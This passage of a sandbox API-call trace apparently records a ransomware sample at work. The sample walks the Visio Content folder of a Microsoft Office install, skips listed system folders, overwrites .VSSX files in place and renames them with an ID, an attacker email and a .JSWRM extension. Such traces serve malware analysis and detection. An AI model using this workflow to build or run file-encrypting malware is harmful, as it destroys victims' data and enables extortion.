lpString2="msocache") returned -1 [0146.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0146.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTHKT_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTHKT_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BTHKT_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0146.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0146.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTHKT_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTHKT_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BTHKT_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0146.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0146.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0146.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0146.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BTHKT_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bthkt_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.164] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=203832) returned 1 [0146.164] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0146.164] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0146.175] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.175] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0146.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0146.175] CloseHandle (hObject=0x314) returned 1 [0146.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0146.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0146.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0146.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0146.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0146.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0146.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0146.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0146.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0146.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0146.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0146.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0146.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0146.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0146.176] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BTHKT_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bthkt_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BTHKT_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bthkt_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0146.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0146.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0146.177] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3c69e3f, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3c69e3f, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3c69e3f, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x17e2a, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BTHKT_VISIO2013_M.VSSX", cAlternateFileName="BTHKT_~4.VSS")) returned 1 [0146.182] lstrcmpiW (lpString1="BTHKT_VISIO2013_M.VSSX", lpString2=".") returned 1 [0146.182] lstrcmpiW (lpString1="BTHKT_VISIO2013_M.VSSX", lpString2="..") returned 1 [0146.182] lstrcmpiW (lpString1="BTHKT_VISIO2013_M.VSSX", lpString2="...") returned 1 [0146.182] lstrcmpiW (lpString1="BTHKT_VISIO2013_M.VSSX", lpString2="windows") returned -1 [0146.182] lstrcmpiW (lpString1="BTHKT_VISIO2013_M.VSSX", lpString2="recovery") returned -1 [0146.182] lstrcmpiW (lpString1="BTHKT_VISIO2013_M.VSSX", lpString2="perflogs") returned -1 [0146.182] lstrcmpiW (lpString1="BTHKT_VISIO2013_M.VSSX", lpString2="documents and settings") returned -1 [0146.182] lstrcmpiW (lpString1="BTHKT_VISIO2013_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.182] lstrcmpiW (lpString1="BTHKT_VISIO2013_M.VSSX", lpString2="system volume information") returned -1 [0146.182] lstrcmpiW (lpString1="BTHKT_VISIO2013_M.VSSX", lpString2="msocache") returned -1 [0146.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0146.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTHKT_VISIO2013_M.VSSX", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0146.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0146.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTHKT_VISIO2013_M.VSSX", cchWideChar=22, lpMultiByteStr=0x2412b8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BTHKT_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 22 [0146.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0146.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0146.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTHKT_VISIO2013_M.VSSX", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0146.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0146.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTHKT_VISIO2013_M.VSSX", cchWideChar=22, lpMultiByteStr=0x241268, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BTHKT_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 22 [0146.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0146.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0146.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0146.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0146.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BTHKT_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bthkt_visio2013_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.183] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=97834) returned 1 [0146.183] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17e20) returned 0x2501e8 [0146.183] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x17e20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x17e20, lpOverlapped=0x0) returned 1 [0146.190] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.190] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x17e20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x17e20, lpOverlapped=0x0) returned 1 [0146.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0146.192] CloseHandle (hObject=0x314) returned 1 [0146.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0146.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0146.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0146.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0146.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0146.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0146.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0146.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0146.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0146.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0146.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0146.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0146.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0146.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0146.192] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BTHKT_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bthkt_visio2013_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BTHKT_VISIO2013_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bthkt_visio2013_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0146.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0146.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0146.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0146.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0146.193] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c3a235, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1c3a235, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1c3a235, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x153d6, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BTHKT_VISIO2013_U.VSSX", cAlternateFileName="BTHKT_~1.VSS")) returned 1 [0146.194] lstrcmpiW (lpString1="BTHKT_VISIO2013_U.VSSX", lpString2=".") returned 1 [0146.194] lstrcmpiW (lpString1="BTHKT_VISIO2013_U.VSSX", lpString2="..") returned 1 [0146.194] lstrcmpiW (lpString1="BTHKT_VISIO2013_U.VSSX", lpString2="...") returned 1 [0146.194] lstrcmpiW (lpString1="BTHKT_VISIO2013_U.VSSX", lpString2="windows") returned -1 [0146.194] lstrcmpiW (lpString1="BTHKT_VISIO2013_U.VSSX", lpString2="recovery") returned -1 [0146.194] lstrcmpiW (lpString1="BTHKT_VISIO2013_U.VSSX", lpString2="perflogs") returned -1 [0146.194] lstrcmpiW (lpString1="BTHKT_VISIO2013_U.VSSX", lpString2="documents and settings") returned -1 [0146.194] lstrcmpiW (lpString1="BTHKT_VISIO2013_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.194] lstrcmpiW (lpString1="BTHKT_VISIO2013_U.VSSX", lpString2="system volume information") returned -1 [0146.194] lstrcmpiW (lpString1="BTHKT_VISIO2013_U.VSSX", lpString2="msocache") returned -1 [0146.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0146.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTHKT_VISIO2013_U.VSSX", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0146.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0146.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTHKT_VISIO2013_U.VSSX", cchWideChar=22, lpMultiByteStr=0x241358, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BTHKT_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 22 [0146.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0146.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0146.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTHKT_VISIO2013_U.VSSX", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0146.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0146.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTHKT_VISIO2013_U.VSSX", cchWideChar=22, lpMultiByteStr=0x241218, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BTHKT_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 22 [0146.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0146.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0146.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0146.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0146.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BTHKT_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bthkt_visio2013_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.197] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=86998) returned 1 [0146.197] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x153d0) returned 0x2501e8 [0146.198] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x153d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x153d0, lpOverlapped=0x0) returned 1 [0146.205] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.205] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x153d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x153d0, lpOverlapped=0x0) returned 1 [0146.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0146.206] CloseHandle (hObject=0x314) returned 1 [0146.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0146.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0146.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0146.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0146.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0146.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0146.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0146.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0146.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0146.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0146.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0146.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0146.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0146.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0146.206] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BTHKT_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bthkt_visio2013_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BTHKT_VISIO2013_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bthkt_visio2013_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0146.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0146.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0146.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0146.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0146.208] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x38fc84a, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x38fc84a, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x38fc84a, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x203d5, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CABNT_M.VSSX", cAlternateFileName="CABNT_~4.VSS")) returned 1 [0146.208] lstrcmpiW (lpString1="CABNT_M.VSSX", lpString2=".") returned 1 [0146.208] lstrcmpiW (lpString1="CABNT_M.VSSX", lpString2="..") returned 1 [0146.208] lstrcmpiW (lpString1="CABNT_M.VSSX", lpString2="...") returned 1 [0146.208] lstrcmpiW (lpString1="CABNT_M.VSSX", lpString2="windows") returned -1 [0146.208] lstrcmpiW (lpString1="CABNT_M.VSSX", lpString2="recovery") returned -1 [0146.208] lstrcmpiW (lpString1="CABNT_M.VSSX", lpString2="perflogs") returned -1 [0146.208] lstrcmpiW (lpString1="CABNT_M.VSSX", lpString2="documents and settings") returned -1 [0146.208] lstrcmpiW (lpString1="CABNT_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.208] lstrcmpiW (lpString1="CABNT_M.VSSX", lpString2="system volume information") returned -1 [0146.208] lstrcmpiW (lpString1="CABNT_M.VSSX", lpString2="msocache") returned -1 [0146.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0146.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CABNT_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, 